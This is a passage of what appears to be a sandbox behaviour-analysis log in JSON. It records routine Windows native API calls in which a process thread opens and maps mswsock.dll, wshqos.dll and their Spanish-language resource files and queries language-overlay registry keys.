"caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + } + ], + "repeated": 0, + "id": 672 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 673 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\mswsock.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 674 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000444" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\mswsock.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 675 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000444" + } + ], + "repeated": 0, + "id": 676 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05470000" + }, + { + "name": "SectionOffset", + "value": "0x0546e110" + }, + { + "name": "ViewSize", + "value": "0x00004000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 677 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 678 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + } + ], + "repeated": 4, + "id": 679 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 680 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000448" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 681 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000044c" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 682 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000044c" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 683 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000044c" + } + ], + "repeated": 0, + "id": 684 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 685 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 686 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 687 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 688 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 689 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "SectionOffset", + "value": "0x0546e110" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 690 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 691 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 692 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 693 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 694 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 695 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 696 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 697 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000448" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 698 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 699 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 700 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 701 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 702 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000450" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 703 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 704 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "SectionOffset", + "value": "0x0546e110" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 705 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 706 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 707 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 708 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 709 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 710 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000450" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 711 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 712 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 713 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 714 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 715 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 716 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 717 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000450" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 718 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 719 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "SectionOffset", + "value": "0x0546e110" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 720 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 721 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 722 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 723 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 724 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 725 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000450" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": 